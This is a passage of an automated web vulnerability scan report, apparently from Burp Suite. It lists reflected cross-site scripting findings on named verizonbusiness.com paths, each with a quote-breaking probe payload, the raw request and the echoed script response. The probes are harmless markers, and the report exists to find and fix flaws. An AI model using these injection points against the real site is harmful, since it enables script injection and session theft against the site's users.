Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productscd3c2'%3b36e386e35b0/it/managed-it/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40644
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Productscd3c2';36e386e35b0/it/managed-it/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.145. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-it/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de848"%3bbd9c29815fb was submitted in the REST URL parameter 2. This input was echoed as de848";bd9c29815fb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/itde848"%3bbd9c29815fb/managed-it/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42311
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/itde848";bd9c29815fb/managed-it/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.146. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-it/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33677'%3b6b36e1baa5f was submitted in the REST URL parameter 2. This input was echoed as 33677';6b36e1baa5f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it33677'%3b6b36e1baa5f/managed-it/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42309
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it33677';6b36e1baa5f/managed-it/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.147. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-it/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11798"%3bcda9f0fc744 was submitted in the REST URL parameter 3. This input was echoed as 11798";cda9f0fc744 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-it11798"%3bcda9f0fc744/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:39 GMT
Content-Type: text/html
Content-Length: 43037
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
h(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/managed-it11798";cda9f0fc744/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.148. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-it/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1f37'%3bcaf8722c66c was submitted in the REST URL parameter 3. This input was echoed as c1f37';caf8722c66c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-itc1f37'%3bcaf8722c66c/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:56 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43035
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/managed-itc1f37';caf8722c66c/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.149. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/prof-svcs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbe89'%3bdec64a1e8d0 was submitted in the REST URL parameter 1. This input was echoed as dbe89';dec64a1e8d0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsdbe89'%3bdec64a1e8d0/it/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40642
Date: Wed, 17 Nov 2010 00:40:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Productsdbe89';dec64a1e8d0/it/prof-svcs/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.150. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/prof-svcs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a602"%3be426c879e4f was submitted in the REST URL parameter 1. This input was echoed as 7a602";e426c879e4f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products7a602"%3be426c879e4f/it/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40642
Date: Wed, 17 Nov 2010 00:40:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products7a602";e426c879e4f/it/prof-svcs/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.151. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/prof-svcs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload deab2'%3b4cd9ccfc36d was submitted in the REST URL parameter 2. This input was echoed as deab2';4cd9ccfc36d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/itdeab2'%3b4cd9ccfc36d/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:53 GMT
Content-Type: text/html
Content-Length: 42309
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/itdeab2';4cd9ccfc36d/prof-svcs/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.152. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/prof-svcs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a0a8"%3b9be4f68ed28 was submitted in the REST URL parameter 2. This input was echoed as 3a0a8";9be4f68ed28 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it3a0a8"%3b9be4f68ed28/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:45 GMT
Content-Type: text/html
Content-Length: 42309
Date: Wed, 17 Nov 2010 00:40:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it3a0a8";9be4f68ed28/prof-svcs/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.153. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/prof-svcs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3535"%3bb60e80bc0c7 was submitted in the REST URL parameter 3. This input was echoed as f3535";b60e80bc0c7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/prof-svcsf3535"%3bb60e80bc0c7/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43035
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/prof-svcsf3535";b60e80bc0c7/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.154. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/prof-svcs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b70c'%3bbbd577dcfe5 was submitted in the REST URL parameter 3. This input was echoed as 4b70c';bbd577dcfe5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/prof-svcs4b70c'%3bbbd577dcfe5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:12 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43033
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/prof-svcs4b70c';bbd577dcfe5/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.155. http://www.verizonbusiness.com/Products/mobility/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77252'%3b40c8498d24e was submitted in the REST URL parameter 1. This input was echoed as 77252';40c8498d24e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products77252'%3b40c8498d24e/mobility/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40636
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products77252';40c8498d24e/mobility/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.156. http://www.verizonbusiness.com/Products/mobility/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f859"%3b9f422dac22d was submitted in the REST URL parameter 1. This input was echoed as 1f859";9f422dac22d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products1f859"%3b9f422dac22d/mobility/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:45:57 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products1f859";9f422dac22d/mobility/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.157. http://www.verizonbusiness.com/Products/mobility/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33169'%3b4bebde12907 was submitted in the REST URL parameter 2. This input was echoed as 33169';4bebde12907 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

